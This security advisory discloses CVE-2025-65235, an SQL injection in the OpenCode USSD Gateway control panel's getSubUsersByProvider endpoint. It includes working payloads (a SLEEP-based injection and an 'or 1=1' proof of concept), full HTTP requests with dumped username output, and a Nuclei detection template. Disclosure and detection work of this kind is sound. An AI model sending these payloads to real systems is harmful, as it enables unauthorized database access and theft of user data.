[CVE-2025-65235] USSD GW SQL Injection - SubUsers
Technical information about the CVE-2025-65235 in OpenCode USSD GW application.
Description
SQL Injection in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands.
Application Details
Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11
Technical Details
Vulnerable Endpoint:
/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProviderVulnerable Parameter:
account_idPayload Sample:
account_id=1; SELECT SLEEP(5)#
Exploitation
The default request is being used to get the username of the account details based on the account ID, the response is shown below
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
account_id=1HTTP/2 200 OK
[...]
{"1" :"USERNAME" }By appending the payload to the parameter, all the usernames will be shown in the response.
You can use different payloads, the below one was used as a POC
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
account_id=1\+or+1=1--+-HTTP/2 200 OK
[...]
{
"1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5"
[...]
}Nuclei Template
You can use this template for easy detection.
id: ocpanel-ussdgw-sqli
info:
name: USSD Gateway OCP Control Panel SQL Injection
author: Eslam Ali Akl
severity: high
description: |
Time-based SQL injection test for the getSubUsersByProvider endpoint.
Injects a SLEEP(5) payload into the account_id parameter and flags the
target if the response time indicates the SQL sleep was executed.
tags: [sqli, time-based, ocpanel]
requests:
- id: time_inject
method: POST
path:
- "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider"
headers:
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
X-Requested-With: "XMLHttpRequest"
User-Agent: "nuclei-scan"
body: "account_id=1; SELECT SLEEP(5)#"
matchers:
- type: dsl
dsl:
- "duration >= 4"
Last updated